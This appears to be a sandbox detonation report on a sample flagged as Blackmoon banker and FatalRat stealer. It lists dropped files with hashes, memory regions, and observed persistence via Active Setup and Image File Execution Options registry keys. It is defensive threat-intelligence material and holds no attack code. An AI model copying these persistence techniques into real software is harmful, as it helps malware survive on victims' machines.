memory/1628-66-0x000000013F940000-0x000000013FEF9000-memory.dmp

memory/596-69-0x0000000000200000-0x0000000000229000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

memory/3012-75-0x00000000012C0000-0x0000000001396000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

MD5 2c706293a3cfff8cc184a8e9a3b3da08
SHA1 873d7c9f51aa6cebd4ad3ae5930d1de84bb4437d
SHA256 ed28baf8be3a588d50ed246c2cd741bbd498aee74ea0675d57e0b33236e22067
SHA512 4aba3e25507ba5c29219ff51553f3616d07aeeb30f7465f9e921eea94cdcb411d1f48d1eefed647c22405df275e7f9d7506aac52202aae137391c6831463b043

memory/3008-83-0x0000000000290000-0x0000000000366000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 a28d7de900751a5d606662f42f04bf14
SHA1 945bdc554657bd52e13b9cdfc3a793ad9e036734
SHA256 0ed44f3613f1b51fc5d00335f63e680cb6bfada5e2ea9a0d31738848864e5f13
SHA512 efa99c1ed2c42c50c04d160411a1e3317643049dd3084cbd89687bc44e556634cbc70c574f46c8d62efa2f398b013f5bfb995b74967a85b462737f13b3f719e6

memory/572-92-0x0000000000160000-0x0000000000236000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 9ebd1a59c2cd58ef1707299c94b45a94
SHA1 262222a28f05520f1b5928c1c242b1ee48035f90
SHA256 dff968204022fff598b65b54a492a217efa3152c318ac4306d2d312448304592
SHA512 4d5bba53443048db049b3a37fe7b67ed3bfb5f1eff2eaf4571fd44f02b8f35d9a289784ea0306e7e9756f62b578adbd8056de2e0dc70f28d01c70f9042338383

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 ec75f79bf26da5705b430094d32251d7
SHA1 3515da89d252a66eec8b7b8690f206f8a21919e0
SHA256 80986ffaaa50da172158c4f89451c717dbed7ee6bd82bf69e7eaf03e3588c869
SHA512 161fea24d5b88721cfdbc343b5f0b36226b25793f3ad13b028ec02786b02e00e497877a2c060c78be85f842df6a9445410d735c8727b5756f7523a2a31eb2ba5

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 3cad336ccb2404ad655886d8e3642cbe
SHA1 a69f9981105a6abe573c3e27a2591545006c42c6
SHA256 a2baf0be39503081bf5e536e6d7c50d6673c1b39e3faf465eba458cdfad74e33
SHA512 66f61b429d237cc254a49cd5f63a62de170e166f56b7aa6a3c0324efabc7a8967dd7b05198657aa9c1555797ceb7c59a04d9f8828c7929fa6a0b1f65b9d42e72

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 3eb0e1895b9ff9d9d60d52a83b3e7ee0
SHA1 dc17e700ba5b5a236d77437c16561e9b10231d60
SHA256 bd51697fd9aa8850b518da380a9283a1c95952d1f31da0d33a317595e7bf0c22
SHA512 b72d30b0970696f075e4ddc537936598dd6cf83022b1bb9f578401661b34701c8eeaf3959a2555febe571cbcc728a7061c2d2f2bbf66d80d922b2670a046feab

C:\ProgramData\Smart\setup.exe

MD5 118a9a9f6280e177fdac16989b8aa1a5
SHA1 fc37316439372be17a982d02cd0d294f7aaca751
SHA256 b995e6a0299f2465fd5881157aab1c6c9753c8e459efd661b9cd1e83be7e53f6
SHA512 14c731e7f7e9736f39d6c79a98bf1a3264da9dc76bab4faca82ec64f276f3d39c9bc4638991e30a06f52bf6204619f5da8c3168d11afe058e0c1d21a89d42878

memory/1388-111-0x00000000779D0000-0x00000000779D2000-memory.dmp

memory/1388-112-0x000000013FC50000-0x0000000140209000-memory.dmp

C:\ProgramData\setup\setup.exe

MD5 4a94844260d6a08828d781d488cef61d
SHA1 de8169fdb5ab8a120df577d92eb25a2767431738
SHA256 46d7a8abe3bb9d7302529246cd8ee6e7d0360d1045fe92662cc7580e72ef5132
SHA512 82549c1e525a90003fb0174ebba2bc3b4f58706ef9fd5e6ee07d489ab536ef286e408db6c15a52b039d3f59c09bd55e35d045def79007da5d414d5d589d34f4f

\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

MD5 cdf152e23a8cbf68dbe3f419701244fc
SHA1 cb850d3675da418131d90ab01320e4e8842228d7
SHA256 84eaf43f33d95da9ab310fc36dc3cfe53823d2220946f021f18cf3f729b8d64e
SHA512 863e1da5bc779fa02cf08587c4de5f04c56e02902c5c4f92a06f2e631380ecabcc98e35d52609f764727e41b965c0786d24ea23fc4b9776d24d9f13e0d8ae0c2

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdate.dll

MD5 dae72b4b8bcf62780d63b9cbb5b36b35
SHA1 1d9b764661cfe4ee0f0388ff75fd0f6866a9cd89
SHA256 b0ca6700e7a4ea667d91bcf3338699f28649c2e0a3c0d8b4f2d146ab7c843ab6
SHA512 402c00cab6dac8981e200b6b8b4263038d76afe47c473d5f2abf0406222b32fff727b495c6b754d207af2778288203ce0774a6200b3e580e90299d08ce0c098f

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_zh-CN.dll

MD5 ca52cc49599bb6bda28c38aea1f9ec4e
SHA1 494f166b530444f39bca27e2b9e10f27e34fc98a
SHA256 f9f144aa2dc0de21b24c93f498a9b4a946b7da42819a776b3283a0bcae18544b
SHA512 05e2d5711eef8f57737b2512de2e73744f17e0a34de0bfd2a06c9cc60a08ebadbafe38e30b66a2ede7fa61d5b9571adddcfbd7e1cafcee1ab2168a563d2d3f0d

memory/1864-208-0x0000000000400000-0x0000000000BA0000-memory.dmp

memory/1864-207-0x0000000000250000-0x0000000000251000-memory.dmp

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_es-419.dll

MD5 1c0b1c3625c9ccace1b23e0c64095ee9
SHA1 3904a80d016e0a9a267c0b5feb8e6747b44b5fa1
SHA256 f030757e1911e9efde0d74a02c22694fa5ef139f73897a7f97acab9da05f7c8b
SHA512 0a988edef8d67cd83c2be65cbfa07059df311732ee92ad73fb9411d7cf7d853a2b8d2ab801733d05ab6afaccab33a2684117bbc1d80b362b677cc53ae9de42f0

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_es.dll

MD5 dae64d49ee97339b7327b52c9f720848
SHA1 15f159c4808f9e4fe6a2f1a4a19faa5d84ac630b
SHA256 e76400e62ae0ab31565e50b05d1001b775a91aa487a54dc90e53c0e103c717c2
SHA512 9ae72e5a658aa0e1fb261d62ccef474cd42d9bec2b4a50f71925d131ffea22b8f60fb961772587ce71cb30a32da3b7986e7483ecea960a509e0450d3983c84b0

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en-GB.dll

MD5 f82ccf890c3ae14bfd7a263d07276e60
SHA1 6a915d6eb8c99d065e36a721d721d556b74bb377
SHA256 6b07a4fd3039541e30c68a8c31c371cda2cea480787f95e0ddbca3cc2fbff0cc
SHA512 4cbf9e6728e08de8d61f34b17bb20d92b6a699969edb9afa013fe962c8fd39238288adcd826134c9bca459904d8574a804c519daac6b301e0d38f68722c0359e

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_en.dll

MD5 741211652c66a8a6790396e1875eefa9
SHA1 2ccd5653b5fc78bcc19f86b493cef11844ba7a0c
SHA256 e0945deacdb6b75ff2587dea975774b9b800747e2ee3f3917e5b40ddb87eda10
SHA512 b70f847d8ca8828c89bbb67b543950fbd514c733cf62b52ad7fc0dab7b2168fe56d1f21bef3210f5c7f563f72831455d870a5f9aa6c557f1e3543ef7329c42f9

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_el.dll

MD5 ecdd26049573614b6f41d8a102ffcf21
SHA1 5140c6cff5d596267a64df1559ac36c4e8f49e42
SHA256 a3377520f2a95b8cc06bd30e493962c07f97eebf4661a69d03efb36b2ca515c5
SHA512 933c181d7575f20480c8deadac3f3e9190081456169122216c72e7b9a04aa75612140fc37697098c7c20b77001a67966fa1661cdc9110c40634c944f833a65b1

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_de.dll

MD5 96d92500b9a763f4b862c511c17e0a47
SHA1 2fd441eb8685d15e14fa6405e82359adea3e7148
SHA256 58829d135ff41e574ed5fc5e0421e4aa204267b02ca3ffaf08d8efb0a70fdd4c
SHA512 a1014584f1f278160d579848fa188f627676aee819e9395517490b00e273db6f583d7ddd31af6e35c9d251021df7fb26c88512aaa1c865c2ee3ba60c0a2db49a

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_da.dll

MD5 9f2e018a4f9a1d278983d0b677b91218
SHA1 c58ee1fc0d8ef9d99f85426b48c7f28f381a2c17
SHA256 d0dcdc68236eecd6b5f0b437eb92b8935741dabf1fa276a552399815af22edec
SHA512 20b74b6a9f81527d4a5fe30671d2559261fb682576f4ab04da7856280fbbaeb6af83894009c9d7cb83deeae988d0ac5ec7ec32b277b7eb45829faec2857d7014

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_cs.dll

MD5 b9033db8d0e5bf254979b0f47d10e93d
SHA1 2859de0d851b5f4fd3056e8f9015cece2436c307
SHA256 12c41c2f472b6a05fd6392e9d4f8aeb9a40840c2cbefd68b39d20f9d1d4d77ed
SHA512 52075df4ae5c86ebb0bac20604ea072a163761ae058c1473211bf4bb0eeed043cfc5a92386f876b53484cdf4e3f8a7b75d8f4bf9894c24f8c22ec23a50b70b7c

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ca.dll

MD5 39e25ba8d69f493e6f18c4ef0cf96de8
SHA1 5584a94a85d83514a46030c4165e8f7a942e63e2
SHA256 1f66ebdcaae482a201a6e0fab9c1f4501c23a0d4ad819ccd555fdca9cc7edb94
SHA512 773c995b449d64e36eb8cab174db29e29e29985bcfd714799d6b05b01bb7d4a0fc2aefaf2e27ff02b0e105fbe0d34d7efe29b193a1bc3365ec47e1f1003bed26

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_bn.dll

MD5 dafa45a82ce30cf2fd621e0a0b8c031f
SHA1 e39ed5213f9bb02d9da2c889425fab8ca6978db7
SHA256 d58e5f0fa894123de1d9b687a5b84826e095eca128ee5df8870f2db74f4233a2
SHA512 2b772ebc128eb59d636eec36583329962ead8e0a399fd56394b1244486bf815f4e033ceef74a62a9930ab2bf6ec1ba5e2d3c942183f7cb2355a716a3e2c6c7a1

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_bg.dll

MD5 c523ec13643d74b187b26b410d39569b
SHA1 46aff0297036c60f22ad30d4e58f429890d9e09d
SHA256 80505863866bcd93a7e617dd8160531401d6d05f48d595348cd321cf7d97aeac
SHA512 ecf98e29a3481b05ab23c3ff89fa3caf054b874ed15462a5e33022aacf561d8fea4a0de35cc5f7450f62110ca4ace613e0c67f543ad22eb417e79eb3ebf24ed7

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_ar.dll

MD5 163695df53cea0728f9f58a46a08e102
SHA1 71b39eec83260e2ccc299fac165414acb46958bd
SHA256 f89dddda3e887385b42ea88118ba8fb1cc68fde0c07d44b851164564eb7c1ec8
SHA512 6dfb70a175097f3c96ae815a563c185136cb5a35f361288cc81570facfa1f1d28f49eaa61172d1da4982ebb76bd3e32c4de77cf97dedfb79f18113d7594d0989

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\goopdateres_am.dll

MD5 849bc7e364e30f8ee4c157f50d5b695e
SHA1 b52b8efa1f3a2c84f436f328decd2912efeb1b18
SHA256 f1384a25a6f40e861455c62190d794415f3e9bfca6317c214847e9535dfc3fb9
SHA512 6fd7f542a7073b3bbf1b0c200bb306b30f1b35a64a1fb013f25c7df76f63ef377d9bd736e8da2e9372f1c994785eaeedb6b60e3a0d4a4e8734c266ad61782d3b

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdateComRegisterShell64.exe

MD5 be535d8b68dd064442f73211466e5987
SHA1 aa49313d9513fd9c2d2b25da09ea24d09cc03435
SHA256 c109bcb63391ac3ea93fb97fbdf3f6ed71316cacb592ef46efaea0024bc9ed59
SHA512 eb50eebeaf83be10aea8088e35a807f9001d07d17d2bc1655c3bc0cb254d0f54303348988514ba5590ebd9d3bde3f1149c3f700f62fbce63c0199ea3cfb1f638

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler64.exe

MD5 b659663611a4c2216dff5ab1b60dd089
SHA1 9a14392a5bdb9ea6b8c3e60224b7ff37091d48b5
SHA256 cad4aa1cf58f6b2e2aceb789d53b18418e67066ec406b2fac786cb845ef89d2b
SHA512 1065f9072cd6f1f4364f1354108f2647ee1d89f87e908a22fcd63bd3149c864c457e62268067a439d0486d8d4aa150aa984ad8ac8b51cae49014b67b80496040

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleCrashHandler.exe

MD5 a11ce10ac47f5f83b9bc980567331a1b
SHA1 63ee42e347b0328f8d71a3aa4dde4c6dc46da726
SHA256 101dbf984c4b3876defe2699d6160acbf1bb3f213e02a32f08fdcdc06821c542
SHA512 ff2f86c4061188ead1bfeebd36de7dbc312adcc95267537697f2bfcbb0c53e7c4ab0cd268cef22f0182391796c4612c97cbdc1266d9ee1960cdd2610d8c2bcb3

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdateCore.exe

MD5 af51ea4d9828e21f72e935b0deae50f2
SHA1 c7fe57c2a16c9f5a5ebdd3cc0910427cba5308bd
SHA256 3575011873d0f6d49c783095dae06e6619f8f5463da578fbe284ca5d1d449619
SHA512 ec9828d0bade39754748fb53cfc7efdc5e57955198bac3c248ea9b5a9a607182bb1477819f220549a8e9eadbe6bf69a12da6c8af3761980d2dd9078eaeaa932f

memory/1864-205-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1864-203-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1624-366-0x0000000000400000-0x000000000090B000-memory.dmp

memory/448-370-0x0000000000400000-0x000000000090B000-memory.dmp

memory/448-372-0x0000000010000000-0x000000001002D000-memory.dmp

C:\Program Files\Google\Chrome\Application\109.0.5414.120\Installer\setup.exe

MD5 b42b8ac29ee0a9c3401ac4e7e186282d
SHA1 69dfb1dd33cf845a1358d862eebc4affe7b51223
SHA256 19545e8376807bce8a430c37cab9731e85052103f769dd60a5da3d93ca68c6ec
SHA512 b5269e7392e77a0fa850049ff61e271c5aab90d546945b17a65cc2ea6420432ae56321e1e39cfd97ccdb3dfc37ddbd6ff77907f5685cc2323b8635c8cdb4a84f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pb

MD5 3433ccf3e03fc35b634cd0627833b0ad
SHA1 789a43382e88905d6eb739ada3a8ba8c479ede02
SHA256 f7d5893372edaa08377cb270a99842a9c758b447b7b57c52a7b1158c0c202e6d
SHA512 21a29f0ef89fec310701dcad191ea4ab670edc0fc161496f7542f707b5b9ce619eb8b709a52073052b0f705d657e03a45be7560c80909e92ae7d5939ce688e9c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Temp\scoped_dir2848_590376402\7505a65e-163f-4408-abb6-dda5be95f00e.tmp

MD5 541f52e24fe1ef9f8e12377a6ccae0c0
SHA1 189898bb2dcae7d5a6057bc2d98b8b450afaebb6
SHA256 81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82
SHA512 d779d78a15c5efca51ebd6b96a7ccb6d718741bdf7d9a37f53b2eb4b98aa1a78bc4cfa57d6e763aab97276c8f9088940ac0476690d4d46023ff4bf52f3326c88

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\scoped_dir2848_590376402\CRX_INSTALL\_locales\en\messages.json

MD5 dbedf86fa9afb3a23dbb126674f166d2
SHA1 5628affbcf6f897b9d7fd9c17deb9aa75036f1cc
SHA256 c0945dd5fdecab40c45361bec068d1996e6ae01196dce524266d740808f753fe
SHA512 931d7ba6da84d4bb073815540f35126f2f035a71bfe460f3ccaed25ad7c1b1792ab36cd7207b99fddf5eaf8872250b54a8958cf5827608f0640e8aafe11e0071

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9223c8df3d34bdfba4a0d9aed978bf3a
SHA1 8e87a4029d9c5eb5b83e60026fc5e9c3b00db972
SHA256 235abe0e9a1c95a0f4f8782374fddf4469ff3b2bedc1c5f1c28e23bf1728ce57
SHA512 0e28865f8121ecaf0787263dcb1603567c550e155ea484a706fbb956d2301812ef5dce36508d138cbf6205615da32015be606b3e91a6706403b88c658a1c8d14

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d541830367cb5786e168cbf9b6965148
SHA1 034f9dce2104bad0a65ec405a956e2087b16a5ba
SHA256 6ef2336e61669dda34a0f95da3864ba5561160f8dd06257e2857c7dcec580f65
SHA512 20d558378b418341e248d55261bfe6348c9a3c01906fe3fc444c78c440dbcf1e9deededa01889792de750b8343bca6106cd2c9eb5db6a3c71a0ba54deb8fbb49

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-21 23:06

Reported

2025-02-21 23:10

Platform

win10ltsc2021-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\svchost.exe -k DcomLaunch -p

Signatures

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Checks installed software on the system

discovery

Checks system information in the registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\el.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\fil.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\chrome.VisualElementsManifest.xml C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.312\goopdateres_sk.dll C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\fr.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ml.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
File created C:\Program Files\Google\Chrome\Temp\source544_324446665\Chrome-bin\133.0.6943.127\Locales\ms.pak C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
